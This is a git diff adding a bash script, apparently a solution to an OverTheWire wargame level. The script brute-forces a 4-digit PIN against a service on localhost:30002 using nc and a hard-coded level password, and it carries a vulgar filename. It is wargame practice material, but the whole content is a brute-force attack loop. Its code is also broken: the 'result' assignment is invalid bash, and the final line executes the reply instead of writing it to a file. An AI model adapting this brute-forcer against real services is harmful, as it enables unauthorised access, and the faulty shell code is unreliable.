diff --git a/overthewire/brutebuttfucker.sh b/overthewire/brutebuttfucker.sh new file mode 100644 index 0000000..fe3c04a --- /dev/null +++ b/overthewire/brutebuttfucker.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +for i in {0000..9999}; +do + vanlig=$(echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002) + + result = $(echo "$vanlig" | grep -o "Correct!") + + echo "trying $i | $result" + + if [[ $result = "Correct!" ]]; then + $vanlig > ./password.txt + fi +done \ No newline at end of file